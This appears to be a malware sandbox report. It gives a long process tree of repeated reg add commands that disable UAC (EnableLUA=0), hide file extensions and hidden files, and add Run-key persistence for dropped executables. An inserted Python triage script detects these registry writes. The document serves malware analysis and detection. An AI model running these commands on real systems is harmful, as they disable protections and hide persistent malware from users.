| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\kSkcMIIs | C:\ProgramData\dyIgEEcE\csUgAwMs.exe | N/A |
Enumerates physical storage devices
Modifies registry key
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | C:\Windows\SysWOW64\cmd.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | C:\Windows\SysWOW64\cmd.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | C:\Windows\SysWOW64\cmd.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\cmd.exe | N/A |
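The signature tables above ("UAC bypass", "Modifies visibility of file extensions in Explorer", "Adds Run key to start application") and the `reg add` command lines in the process tree below all describe the same three registry behaviours: EnableLUA set to 0, Explorer's HideFileExt/Hidden values changed, and Run-key entries pointing at dropped binaries. The script below is an added triage example written for this page; it is not part of the sandbox report or of the sample. It normalises both forms the report uses (the `reg add ...` command line and the `\REGISTRY\...\Name = "data"` indicator string) into one key/value/data shape and matches them against a small rule set. The sample inputs are copied from this report plus one constructed benign line; the ATT&CK technique IDs in the rule text are the editor's mapping, not something the report states.

```python
"""Triage registry writes recorded in a sandbox report (added example, not report code).

Two input forms are handled: the `reg add <key> /v <name> /t <type> /d <data> /f`
command lines from the process tree, and the `\\REGISTRY\\...\\Name = "data"`
indicator strings from the signature tables. Both become a RegWrite that is
checked against the behaviours this report flags.
"""
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional

HIVES = {"HKLM": "HKEY_LOCAL_MACHINE", "HKCU": "HKEY_CURRENT_USER"}
POLICIES_SYSTEM = "HKEY_LOCAL_MACHINE\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM"
EXPLORER_ADVANCED = "HKEY_CURRENT_USER\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED"
RUN_KEYS = {
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN",
    "HKEY_CURRENT_USER\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN",
}


@dataclass(frozen=True)
class RegWrite:
    key: str    # normalised, upper-cased key path without Wow6432Node
    value: str  # value name, upper-cased
    data: str   # data as written, unquoted


def normalise_key(raw: str) -> str:
    """Map HKLM\\..., \\REGISTRY\\MACHINE\\... and \\REGISTRY\\USER\\<SID>\\... onto one spelling."""
    key = raw.strip().strip('"')
    sid_form = re.match(r"\\REGISTRY\\USER\\S-1-5-[\d-]+\\(.*)", key, re.I)
    if sid_form:                                   # per-user hive in the sandbox's indicator form
        key = "HKEY_CURRENT_USER\\" + sid_form.group(1)
    elif key.upper().startswith("\\REGISTRY\\MACHINE\\"):
        key = "HKEY_LOCAL_MACHINE\\" + key[len("\\REGISTRY\\MACHINE\\"):]
    else:                                          # reg.exe short hive names
        hive, _, rest = key.partition("\\")
        key = HIVES.get(hive.upper(), hive.upper()) + "\\" + rest
    # WOW64 redirection: a 32-bit process writing HKLM\SOFTWARE lands under Wow6432Node;
    # strip it so the Run key is recognised either way.
    key = re.sub(r"\\WOW6432NODE\\", lambda _: "\\", key, flags=re.I)
    return key.upper()


def parse_reg_add(cmdline: str) -> Optional[RegWrite]:
    """Parse a `reg add` command line; switches may appear in any order (as in this report)."""
    tokens = cmdline.split()
    if len(tokens) < 3 or tokens[0].lower().rsplit("\\", 1)[-1] not in ("reg", "reg.exe"):
        return None
    if tokens[1].lower() != "add":
        return None
    opts: Dict[str, str] = {}
    i = 3
    while i < len(tokens):
        if tokens[i].lower() in ("/v", "/t", "/d") and i + 1 < len(tokens):
            opts[tokens[i].lower()] = tokens[i + 1]
            i += 2
        else:                                      # /f and anything unrecognised
            i += 1
    return RegWrite(normalise_key(tokens[2]), opts.get("/v", "").upper(), opts.get("/d", ""))


INDICATOR = re.compile(r'^(?P<path>\\REGISTRY\\[^=]+?)\s*=\s*"(?P<data>.*)"$')


def parse_indicator(indicator: str) -> Optional[RegWrite]:
    """Parse the report's `\\REGISTRY\\...\\Name = "data"` indicator string."""
    m = INDICATOR.match(indicator.strip())
    if not m:
        return None
    key, _, name = m.group("path").rpartition("\\")
    data = m.group("data").replace("\\\\", "\\")  # the report doubles backslashes in string data
    return RegWrite(normalise_key(key), name.upper(), data)


def classify(w: RegWrite) -> List[str]:
    """Return the behaviours a write matches (ATT&CK IDs are the editor's mapping)."""
    hits: List[str] = []
    if w.key == POLICIES_SYSTEM and w.value == "ENABLELUA" and w.data == "0":
        hits.append("UAC disabled via EnableLUA=0 (T1548.002); takes effect after reboot")
    if w.key == EXPLORER_ADVANCED and w.value == "HIDEFILEEXT" and w.data == "1":
        hits.append("Explorer hides file extensions (T1564.001)")
    if w.key == EXPLORER_ADVANCED and w.value == "HIDDEN" and w.data == "2":
        hits.append("Explorer hides hidden files (T1564.001)")
    if w.key in RUN_KEYS:
        writable = bool(re.search(r"\\(PROGRAMDATA|USERS)\\", w.data.upper()))
        hits.append(f"Run-key persistence {w.value} -> {w.data}"
                    f" ({'user-writable location' if writable else 'other location'}) (T1547.001)")
    return hits


def triage(lines: Iterable[str]) -> Dict[str, List[str]]:
    """Return {line: findings} for every input line that matched at least one rule."""
    report: Dict[str, List[str]] = {}
    for line in lines:
        write = parse_reg_add(line) or parse_indicator(line)
        if write and classify(write):
            report[line] = classify(write)
    return report


# Sample input: three reg.exe command lines and two Run-key indicators copied from this
# report, plus one constructed benign write that must not match.
SAMPLE_LINES = [
    r"reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f",
    r"reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1",
    r"reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2",
    r'\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\fyAAYsIM.exe = "C:\\ProgramData\\guYwUoIY\\fyAAYsIM.exe"',
    r'\REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Windows\CurrentVersion\Run\duUEccEA.exe = "C:\\Users\\Admin\\kSkcMIIs\\duUEccEA.exe"',
    r"reg add HKCU\Software\Contoso\Demo /v Setting /t REG_SZ /d hello /f",  # constructed, benign
]

if __name__ == "__main__":
    for line, findings in triage(SAMPLE_LINES).items():
        print(line)
        for finding in findings:
            print("    ", finding)
```

Two points worth keeping in mind when reusing the rules against live telemetry: the Run entries this sample writes land under `Wow6432Node` only because the 32-bit process is subject to WOW64 registry redirection, and entries there are still executed at logon, so the normalisation above deliberately ignores that path component; and `EnableLUA = 0` does not disable UAC for the running session, it only takes effect after a restart, which is why the sample also keeps re-querying the value.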
Processes
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
"C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe"
C:\Users\Admin\kSkcMIIs\duUEccEA.exe
"C:\Users\Admin\kSkcMIIs\duUEccEA.exe"
C:\ProgramData\guYwUoIY\fyAAYsIM.exe
"C:\ProgramData\guYwUoIY\fyAAYsIM.exe"
C:\ProgramData\dyIgEEcE\csUgAwMs.exe
C:\ProgramData\dyIgEEcE\csUgAwMs.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-596646768-802512095622783779-868951223-195724543418692914761190657459-1720438155"
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "9810981441396653579-1849624713595898508-454275408211637420210607638891375812296"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "2172345871209378423-137478335764207028-860254577-16450157491189135076-1950457964"
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "193694251662382749215606233-140588349713075674951110542037472729274518400706"
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-15808430114194992921351289086-1009520093785116381318175564312617550-766454493"
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
